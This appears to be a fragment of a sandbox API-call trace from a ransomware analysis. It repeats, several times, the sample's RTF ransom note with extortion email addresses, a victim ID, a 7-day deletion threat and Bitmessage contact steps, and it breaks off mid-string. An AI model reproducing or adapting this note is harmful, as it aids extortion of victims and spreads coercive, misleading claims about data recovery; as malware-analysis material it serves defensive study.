ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.829] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.829] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 